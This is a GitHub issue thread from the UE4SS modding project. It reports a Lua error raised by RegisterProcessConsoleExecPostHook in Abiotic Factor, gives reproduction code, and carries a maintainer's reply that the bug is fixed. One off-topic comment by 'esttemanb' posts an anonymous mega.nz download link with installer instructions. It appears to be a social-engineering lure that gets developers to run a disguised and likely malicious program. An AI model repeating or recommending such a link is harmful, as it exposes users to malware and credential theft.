### ISSUE TITLE
[BUG - Experimental] RegisterProcessConsoleExecPostHook is broken

### ISSUE THREAD

**Issue by igromanru** [UE4SS-RE/RE-UE4SS#635]
**Branch or Release**
Experimental Release UE4SS_v3.0.1-154-g1b5ff77

**Game and Engine Version**
Game: Abiotic Factor
Engine: 5.3.2

**Describe the bug**
After executing `RegisterProcessConsoleExecPostHook` with a simple callback, any text send to console will lead to the error.
```
Error: [Lua::call_function] lua_pcall returned LUA_ERRRUN => attempt to call a RemoteUnrealParam value
```

**Mods directory**
I've disabled the default **BPModLoaderMod** mod in the *mods.json* and *mods.txt* because it causes a crash on "Restart All Mods"

**To Reproduce**
1. Create a blank mod
2. In the main.lua add following code:
```lua
RegisterProcessConsoleExecPostHook(function(Context, Command, Parameters, OutputDevice, Executor)
    return nil
end)
```
3. Launch the game with default UE4SS settings and mods.
4. Open console with F10, type anything you want and press "enter"

**Screenshots, UE4SS Log, and .dmp file**
Nothing to show. no crashes no errors beside the lua error.

**Desktop (please complete the following information):**
 - OS: Windows 11 Pro

**Comment by UE4SS** [comment]
Fixed by #631

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by igromanru** [comment]
Too bad it wasn't associated with an issue, was searching for it. Will look next time at PR as well.
